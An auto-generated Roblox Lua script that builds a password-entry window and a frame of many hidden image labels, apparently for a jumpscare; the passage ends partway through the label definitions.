-- Gui to Lua
-- Version: 3.2

-- Instances:

local PasswordUI = Instance.new("ScreenGui")
local PasswordFrame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TopBar = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Enter = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local PasswordBox = Instance.new("TextBox")
local UICorner_4 = Instance.new("UICorner")
local Transition = Instance.new("Frame")
local UICorner_5 = Instance.new("UICorner")
local Exit = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local Scary = Instance.new("Frame")
local _1 = Instance.new("ImageLabel")
local _2 = Instance.new("ImageLabel")
local _2_2 = Instance.new("ImageLabel")
local _2_3 = Instance.new("ImageLabel")
local _3 = Instance.new("ImageLabel")
local _3_2 = Instance.new("ImageLabel")
local _3_3 = Instance.new("ImageLabel")
local _3_4 = Instance.new("ImageLabel")
local _3_5 = Instance.new("ImageLabel")
local _10 = Instance.new("ImageLabel")
local _10_2 = Instance.new("ImageLabel")
local _10_3 = Instance.new("ImageLabel")
local _10_4 = Instance.new("ImageLabel")
local _10_5 = Instance.new("ImageLabel")
local _10_6 = Instance.new("ImageLabel")
local _10_7 = Instance.new("ImageLabel")
local _10_8 = Instance.new("ImageLabel")
local _10_9 = Instance.new("ImageLabel")
local _9 = Instance.new("ImageLabel")
local _9_2 = Instance.new("ImageLabel")
local _8 = Instance.new("ImageLabel")
local _8_2 = Instance.new("ImageLabel")
local _8_3 = Instance.new("ImageLabel")
local _8_4 = Instance.new("ImageLabel")
local _8_5 = Instance.new("ImageLabel")
local _8_6 = Instance.new("ImageLabel")
local _4 = Instance.new("ImageLabel")
local _4_2 = Instance.new("ImageLabel")
local _4_3 = Instance.new("ImageLabel")
local _4_4 = Instance.new("ImageLabel")
local _4_5 = Instance.new("ImageLabel")
local _4_6 = Instance.new("ImageLabel")
local _4_7 = Instance.new("ImageLabel")
local _4_8 = Instance.new("ImageLabel")
local _4_9 = Instance.new("ImageLabel")
local _10_10 = Instance.new("ImageLabel")
local _5 = Instance.new("ImageLabel")
local _5_2 = Instance.new("ImageLabel")
local _5_3 = Instance.new("ImageLabel")
local _5_4 = Instance.new("ImageLabel")
local _5_5 = Instance.new("ImageLabel")
local _5_6 = Instance.new("ImageLabel")
local _5_7 = Instance.new("ImageLabel")
local _5_8 = Instance.new("ImageLabel")
local _5_9 = Instance.new("ImageLabel")
local _10_11 = Instance.new("ImageLabel")
local _10_12 = Instance.new("ImageLabel")
local _10_13 = Instance.new("ImageLabel")
local _10_14 = Instance.new("ImageLabel")
local _10_15 = Instance.new("ImageLabel")
local _10_16 = Instance.new("ImageLabel")
local _9_3 = Instance.new("ImageLabel")
local _9_4 = Instance.new("ImageLabel")
local _9_5 = Instance.new("ImageLabel")
local _9_6 = Instance.new("ImageLabel")
local _9_7 = Instance.new("ImageLabel")
local _9_8 = Instance.new("ImageLabel")
local _9_9 = Instance.new("ImageLabel")
local _9_10 = Instance.new("ImageLabel")
local _9_11 = Instance.new("ImageLabel")
local _9_12 = Instance.new("ImageLabel")
local _9_13 = Instance.new("ImageLabel")
local _9_14 = Instance.new("ImageLabel")
local _9_15 = Instance.new("ImageLabel")
local _9_16 = Instance.new("ImageLabel")
local _9_17 = Instance.new("ImageLabel")
local _9_18 = Instance.new("ImageLabel")
local _9_19 = Instance.new("ImageLabel")
local _9_20 = Instance.new("ImageLabel")
local _9_21 = Instance.new("ImageLabel")
local _8_7 = Instance.new("ImageLabel")
local _8_8 = Instance.new("ImageLabel")
local _8_9 = Instance.new("ImageLabel")
local _8_10 = Instance.new("ImageLabel")
local _6 = Instance.new("ImageLabel")
local _6_2 = Instance.new("ImageLabel")
local _6_3 = Instance.new("ImageLabel")
local _6_4 = Instance.new("ImageLabel")
local _6_5 = Instance.new("ImageLabel")
local _7 = Instance.new("ImageLabel")
local _7_2 = Instance.new("ImageLabel")
local _7_3 = Instance.new("ImageLabel")
local _7_4 = Instance.new("ImageLabel")
local _7_5 = Instance.new("ImageLabel")
local _7_6 = Instance.new("ImageLabel")
local _7_7 = Instance.new("ImageLabel")
local _7_8 = Instance.new("ImageLabel")
local _7_9 = Instance.new("ImageLabel")
local _9_22 = Instance.new("ImageLabel")
local _9_23 = Instance.new("ImageLabel")
local _9_24 = Instance.new("ImageLabel")
local _9_25 = Instance.new("ImageLabel")
local EW = Instance.new("ImageLabel")

--Properties:

PasswordUI.Name = "PasswordUI"
PasswordUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
PasswordUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

PasswordFrame.Name = "PasswordFrame"
PasswordFrame.Parent = PasswordUI
PasswordFrame.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
PasswordFrame.Position = UDim2.new(0.339630127, 0, 0.353158891, 0)
PasswordFrame.Size = UDim2.new(0, 241, 0, 182)

UICorner.Parent = PasswordFrame

TopBar.Name = "TopBar"
TopBar.Parent = PasswordFrame
TopBar.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
TopBar.Size = UDim2.new(0, 241, 0, 58)

UICorner_2.Parent = TopBar

Frame.Parent = TopBar
Frame.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0, 0, 0.741379321, 0)
Frame.Size = UDim2.new(0, 241, 0, 15)

TextLabel.Parent = TopBar
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.0456431545, 0, 0.120689653, 0)
TextLabel.Size = UDim2.new(0, 219, 0, 29)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Enter Password:"
TextLabel.TextColor3 = Color3.fromRGB(170, 0, 127)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

Enter.Name = "Enter"
Enter.Parent = PasswordFrame
Enter.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
Enter.LayoutOrder = 1
Enter.Position = UDim2.new(0.0829999596, 0, 0.632116616, 0)
Enter.Size = UDim2.new(0, 200, 0, 32)
Enter.Font = Enum.Font.SourceSans
Enter.Text = "Enter"
Enter.TextColor3 = Color3.fromRGB(255, 84, 69)
Enter.TextSize = 14.000

UICorner_3.CornerRadius = UDim.new(0, 12)
UICorner_3.Parent = Enter

PasswordBox.Name = "PasswordBox"
PasswordBox.Parent = PasswordFrame
PasswordBox.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
PasswordBox.Position = UDim2.new(0.0829999968, 0, 0.314032972, 0)
PasswordBox.Size = UDim2.new(0, 200, 0, 50)
PasswordBox.Font = Enum.Font.SourceSans
PasswordBox.PlaceholderColor3 = Color3.fromRGB(255, 84, 69)
PasswordBox.PlaceholderText = "Password"
PasswordBox.Text = ""
PasswordBox.TextColor3 = Color3.fromRGB(0, 0, 0)
PasswordBox.TextSize = 14.000

UICorner_4.CornerRadius = UDim.new(0, 12)
UICorner_4.Parent = PasswordBox

Transition.Name = "Transition"
Transition.Parent = PasswordFrame
Transition.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
Transition.BorderSizePixel = 0
Transition.Position = UDim2.new(0, 0, 0.256349504, 0)
Transition.Size = UDim2.new(0, 240, 0, 3)

UICorner_5.Parent = Transition

Exit.Name = "Exit"
Exit.Parent = PasswordFrame
Exit.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
Exit.LayoutOrder = 2
Exit.Position = UDim2.new(0.0829999596, 0, 0.851896822, 0)
Exit.Size = UDim2.new(0, 200, 0, 19)
Exit.ZIndex = 0
Exit.Font = Enum.Font.SourceSans
Exit.Text = "Exit"
Exit.TextColor3 = Color3.fromRGB(255, 84, 69)
Exit.TextSize = 14.000

UICorner_6.CornerRadius = UDim.new(0, 12)
UICorner_6.Parent = Exit

Scary.Name = "Scary"
Scary.Parent = PasswordUI
Scary.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Scary.BackgroundTransparency = 1.000
Scary.Size = UDim2.new(1, 0, 1, 0)

_1.Name = "1"
_1.Parent = Scary
_1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_1.Position = UDim2.new(0.508586526, 0, 0.531300247, 0)
_1.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_1.Visible = false
_1.Image = "rbxassetid://4519042259"

_2.Name = "2"
_2.Parent = Scary
_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_2.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_2.Visible = false
_2.Image = "rbxassetid://4519042259"

_2_2.Name = "2"
_2_2.Parent = Scary
_2_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_2_2.Position = UDim2.new(0.461030394, 0, 0.436597168, 0)
_2_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_2_2.Visible = false
_2_2.Image = "rbxassetid://4519042259"

_2_3.Name = "2"
_2_3.Parent = Scary
_2_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_2_3.Position = UDim2.new(0.339498013, 0, 0.645264924, 0)
_2_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_2_3.Visible = false
_2_3.Image = "rbxassetid://4519042259"

_3.Name = "3"
_3.Parent = Scary
_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_3.Position = UDim2.new(0.714663148, 0, 0.0144462883, 0)
_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_3.Visible = false
_3.Image = "rbxassetid://4519042259"

_3_2.Name = "3"
_3_2.Parent = Scary
_3_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_3_2.Position = UDim2.new(-0.00132100657, 0, 0.831460714, 0)
_3_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_3_2.Visible = false
_3_2.Image = "rbxassetid://4519042259"

_3_3.Name = "3"
_3_3.Parent = Scary
_3_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_3_3.Position = UDim2.new(0.25627476, 0, 0.444622874, 0)
_3_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_3_3.Visible = false
_3_3.Image = "rbxassetid://4519042259"

_3_4.Name = "3"
_3_4.Parent = Scary
_3_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_3_4.Position = UDim2.new(0.723910213, 0, 0.833065867, 0)
_3_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_3_4.Visible = false
_3_4.Image = "rbxassetid://4519042259"

_3_5.Name = "3"
_3_5.Parent = Scary
_3_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_3_5.Position = UDim2.new(0.011889033, 0, 0.346709549, 0)
_3_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_3_5.Visible = false
_3_5.Image = "rbxassetid://4519042259"

_10.Name = "10"
_10.Parent = Scary
_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10.Position = UDim2.new(0.618229866, 0, 0.614767313, 0)
_10.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10.Visible = false
_10.Image = "rbxassetid://4519042259"

_10_2.Name = "10"
_10_2.Parent = Scary
_10_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_2.Position = UDim2.new(0.0422721282, 0, 0.579454303, 0)
_10_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_2.Visible = false
_10_2.Image = "rbxassetid://4519042259"

_10_3.Name = "10"
_10_3.Parent = Scary
_10_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_3.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_10_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_3.Visible = false
_10_3.Image = "rbxassetid://4519042259"

_10_4.Name = "10"
_10_4.Parent = Scary
_10_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_4.Position = UDim2.new(0.479524434, 0, 0.0272873789, 0)
_10_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_4.Visible = false
_10_4.Image = "rbxassetid://4519042259"

_10_5.Name = "10"
_10_5.Parent = Scary
_10_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_5.Position = UDim2.new(0.758256316, 0, 0.380417407, 0)
_10_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_5.Visible = false
_10_5.Image = "rbxassetid://4519042259"

_10_6.Name = "10"
_10_6.Parent = Scary
_10_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_6.Position = UDim2.new(0.284015834, 0, 0.0626003817, 0)
_10_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_6.Visible = false
_10_6.Image = "rbxassetid://4519042259"

_10_7.Name = "10"
_10_7.Parent = Scary
_10_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_7.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_10_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_7.Visible = false
_10_7.Image = "rbxassetid://4519042259"

_10_8.Name = "10"
_10_8.Parent = Scary
_10_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_8.Position = UDim2.new(0, 0, -0.00160507858, 0)
_10_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_8.Visible = false
_10_8.Image = "rbxassetid://4519042259"

_10_9.Name = "10"
_10_9.Parent = Scary
_10_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_9.Position = UDim2.new(0.269484818, 0, 0.791332304, 0)
_10_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_9.Visible = false
_10_9.Image = "rbxassetid://4519042259"

_9.Name = "9"
_9.Parent = Scary
_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9.Position = UDim2.new(0.618229866, 0, 0.614767313, 0)
_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9.Visible = false
_9.Image = "rbxassetid://4519042259"

_9_2.Name = "9"
_9_2.Parent = Scary
_9_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_2.Position = UDim2.new(0.0422721282, 0, 0.579454303, 0)
_9_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_2.Visible = false
_9_2.Image = "rbxassetid://4519042259"

_8.Name = "8"
_8.Parent = Scary
_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8.Position = UDim2.new(0.0422721282, 0, 0.579454303, 0)
_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8.Visible = false
_8.Image = "rbxassetid://4519042259"

_8_2.Name = "8"
_8_2.Parent = Scary
_8_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_2.Position = UDim2.new(0.479524434, 0, 0.0272873789, 0)
_8_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_2.Visible = false
_8_2.Image = "rbxassetid://4519042259"

_8_3.Name = "8"
_8_3.Parent = Scary
_8_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_3.Position = UDim2.new(0, 0, -0.00160507858, 0)
_8_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_3.Visible = false
_8_3.Image = "rbxassetid://4519042259"

_8_4.Name = "8"
_8_4.Parent = Scary
_8_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_4.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_8_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_4.Visible = false
_8_4.Image = "rbxassetid://4519042259"

_8_5.Name = "8"
_8_5.Parent = Scary
_8_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_5.Position = UDim2.new(0.618229866, 0, 0.614767313, 0)
_8_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_5.Visible = false
_8_5.Image = "rbxassetid://4519042259"

_8_6.Name = "8"
_8_6.Parent = Scary
_8_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_6.Position = UDim2.new(0.269484818, 0, 0.791332304, 0)
_8_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_6.Visible = false
_8_6.Image = "rbxassetid://4519042259"

_4.Name = "4"
_4.Parent = Scary
_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4.Visible = false
_4.Image = "rbxassetid://4519042259"

_4_2.Name = "4"
_4_2.Parent = Scary
_4_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_2.Position = UDim2.new(0.284015834, 0, 0.0626003817, 0)
_4_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_2.Visible = false
_4_2.Image = "rbxassetid://4519042259"

_4_3.Name = "4"
_4_3.Parent = Scary
_4_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_3.Position = UDim2.new(0.758256316, 0, 0.380417407, 0)
_4_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_3.Visible = false
_4_3.Image = "rbxassetid://4519042259"

_4_4.Name = "4"
_4_4.Parent = Scary
_4_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_4.Position = UDim2.new(0.269484818, 0, 0.791332304, 0)
_4_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_4.Visible = false
_4_4.Image = "rbxassetid://4519042259"

_4_5.Name = "4"
_4_5.Parent = Scary
_4_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_5.Position = UDim2.new(0.479524434, 0, 0.0272873789, 0)
_4_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_5.Visible = false
_4_5.Image = "rbxassetid://4519042259"

_4_6.Name = "4"
_4_6.Parent = Scary
_4_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_6.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_4_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_6.Visible = false
_4_6.Image = "rbxassetid://4519042259"

_4_7.Name = "4"
_4_7.Parent = Scary
_4_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_7.Position = UDim2.new(0, 0, -0.00160507858, 0)
_4_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_7.Visible = false
_4_7.Image = "rbxassetid://4519042259"

_4_8.Name = "4"
_4_8.Parent = Scary
_4_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_8.Position = UDim2.new(0.618229866, 0, 0.614767313, 0)
_4_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_8.Visible = false
_4_8.Image = "rbxassetid://4519042259"

_4_9.Name = "4"
_4_9.Parent = Scary
_4_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_4_9.Position = UDim2.new(0.0422721282, 0, 0.579454303, 0)
_4_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_4_9.Visible = false
_4_9.Image = "rbxassetid://4519042259"

_10_10.Name = "10"
_10_10.Parent = Scary
_10_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_10.Position = UDim2.new(0.581241727, 0, 0.152488023, 0)
_10_10.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_10.Visible = false
_10_10.Image = "rbxassetid://4519042259"

_5.Name = "5"
_5.Parent = Scary
_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5.Position = UDim2.new(0.756935239, 0, 0.589085162, 0)
_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5.Visible = false
_5.Image = "rbxassetid://4519042259"

_5_2.Name = "5"
_5_2.Parent = Scary
_5_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_2.Position = UDim2.new(0.531043589, 0, 0.357945502, 0)
_5_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_2.Visible = false
_5_2.Image = "rbxassetid://4519042259"

_5_3.Name = "5"
_5_3.Parent = Scary
_5_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_3.Position = UDim2.new(0.581241727, 0, 0.152488023, 0)
_5_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_3.Visible = false
_5_3.Image = "rbxassetid://4519042259"

_5_4.Name = "5"
_5_4.Parent = Scary
_5_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_4.Position = UDim2.new(0.38441214, 0, 0.192616433, 0)
_5_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_4.Visible = false
_5_4.Image = "rbxassetid://4519042259"

_5_5.Name = "5"
_5_5.Parent = Scary
_5_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_5.Position = UDim2.new(0.531043589, 0, 0.744783401, 0)
_5_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_5.Visible = false
_5_5.Image = "rbxassetid://4519042259"

_5_6.Name = "5"
_5_6.Parent = Scary
_5_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_6.Position = UDim2.new(0.136063412, 0, 0.698234379, 0)
_5_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_6.Visible = false
_5_6.Image = "rbxassetid://4519042259"

_5_7.Name = "5"
_5_7.Parent = Scary
_5_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_7.Position = UDim2.new(0.459709376, 0, 0.886035383, 0)
_5_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_7.Visible = false
_5_7.Image = "rbxassetid://4519042259"

_5_8.Name = "5"
_5_8.Parent = Scary
_5_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_8.Position = UDim2.new(0.739762247, 0, 0.49277693, 0)
_5_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_8.Visible = false
_5_8.Image = "rbxassetid://4519042259"

_5_9.Name = "5"
_5_9.Parent = Scary
_5_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_5_9.Position = UDim2.new(-0.0290620923, 0, 0.467094779, 0)
_5_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_5_9.Visible = false
_5_9.Image = "rbxassetid://4519042259"

_10_11.Name = "10"
_10_11.Parent = Scary
_10_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_11.Position = UDim2.new(0.38441214, 0, 0.192616433, 0)
_10_11.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_11.Visible = false
_10_11.Image = "rbxassetid://4519042259"

_10_12.Name = "10"
_10_12.Parent = Scary
_10_12.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_12.Position = UDim2.new(0.531043589, 0, 0.357945502, 0)
_10_12.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_12.Visible = false
_10_12.Image = "rbxassetid://4519042259"

_10_13.Name = "10"
_10_13.Parent = Scary
_10_13.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_13.Position = UDim2.new(0.756935239, 0, 0.589085162, 0)
_10_13.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_13.Visible = false
_10_13.Image = "rbxassetid://4519042259"

_10_14.Name = "10"
_10_14.Parent = Scary
_10_14.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_14.Position = UDim2.new(0.461030394, 0, 0.215088338, 0)
_10_14.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_14.Visible = false
_10_14.Image = "rbxassetid://4519042259"

_10_15.Name = "10"
_10_15.Parent = Scary
_10_15.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_15.Position = UDim2.new(0.269484818, 0, 0.791332304, 0)
_10_15.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_15.Visible = false
_10_15.Image = "rbxassetid://4519042259"

_10_16.Name = "10"
_10_16.Parent = Scary
_10_16.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_10_16.Position = UDim2.new(0.618229866, 0, 0.614767313, 0)
_10_16.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_10_16.Visible = false
_10_16.Image = "rbxassetid://4519042259"

_9_3.Name = "9"
_9_3.Parent = Scary
_9_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_3.Position = UDim2.new(0.531043589, 0, 0.744783401, 0)
_9_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_3.Visible = false
_9_3.Image = "rbxassetid://4519042259"

_9_4.Name = "9"
_9_4.Parent = Scary
_9_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_4.Position = UDim2.new(0.581241727, 0, 0.152488023, 0)
_9_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_4.Visible = false
_9_4.Image = "rbxassetid://4519042259"

_9_5.Name = "9"
_9_5.Parent = Scary
_9_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_5.Position = UDim2.new(0.531043589, 0, 0.357945502, 0)
_9_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_5.Visible = false
_9_5.Image = "rbxassetid://4519042259"

_9_6.Name = "9"
_9_6.Parent = Scary
_9_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_6.Position = UDim2.new(0.136063412, 0, 0.698234379, 0)
_9_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_6.Visible = false
_9_6.Image = "rbxassetid://4519042259"

_9_7.Name = "9"
_9_7.Parent = Scary
_9_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_7.Position = UDim2.new(0.38441214, 0, 0.192616433, 0)
_9_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_7.Visible = false
_9_7.Image = "rbxassetid://4519042259"

_9_8.Name = "9"
_9_8.Parent = Scary
_9_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_8.Position = UDim2.new(0.756935239, 0, 0.589085162, 0)
_9_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_8.Visible = false
_9_8.Image = "rbxassetid://4519042259"

_9_9.Name = "9"
_9_9.Parent = Scary
_9_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_9.Position = UDim2.new(0.459709376, 0, 0.886035383, 0)
_9_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_9.Visible = false
_9_9.Image = "rbxassetid://4519042259"

_9_10.Name = "9"
_9_10.Parent = Scary
_9_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_10.Position = UDim2.new(0.739762247, 0, 0.49277693, 0)
_9_10.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_10.Visible = false
_9_10.Image = "rbxassetid://4519042259"

_9_11.Name = "9"
_9_11.Parent = Scary
_9_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_11.Position = UDim2.new(-0.0290620923, 0, 0.467094779, 0)
_9_11.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_11.Visible = false
_9_11.Image = "rbxassetid://4519042259"

_9_12.Name = "9"
_9_12.Parent = Scary
_9_12.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_12.Position = UDim2.new(0.25627476, 0, -0.0321026593, 0)
_9_12.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_12.Visible = false
_9_12.Image = "rbxassetid://4519042259"

_9_13.Name = "9"
_9_13.Parent = Scary
_9_13.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_13.Position = UDim2.new(-0.0686922073, 0, 0.213483214, 0)
_9_13.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_13.Visible = false
_9_13.Image = "rbxassetid://4519042259"

_9_14.Name = "9"
_9_14.Parent = Scary
_9_14.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_14.Position = UDim2.new(0.297225893, 0, 0.316211939, 0)
_9_14.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_14.Visible = false
_9_14.Image = "rbxassetid://4519042259"

_9_15.Name = "9"
_9_15.Parent = Scary
_9_15.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_15.Position = UDim2.new(0.553500652, 0, -0.0658105165, 0)
_9_15.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_15.Visible = false
_9_15.Image = "rbxassetid://4519042259"

_9_16.Name = "9"
_9_16.Parent = Scary
_9_16.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_16.Position = UDim2.new(-0.0145310462, 0, 0.101123661, 0)
_9_16.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_16.Visible = false
_9_16.Image = "rbxassetid://4519042259"

_9_17.Name = "9"
_9_17.Parent = Scary
_9_17.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_17.Position = UDim2.new(0.758256257, 0, 0.152488023, 0)
_9_17.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_17.Visible = false
_9_17.Image = "rbxassetid://4519042259"

_9_18.Name = "9"
_9_18.Parent = Scary
_9_18.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_18.Position = UDim2.new(0.162483484, 0, 0.213483229, 0)
_9_18.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_18.Visible = false
_9_18.Image = "rbxassetid://4519042259"

_9_19.Name = "9"
_9_19.Parent = Scary
_9_19.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_19.Position = UDim2.new(-0.0686922073, 0, 0.579454303, 0)
_9_19.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
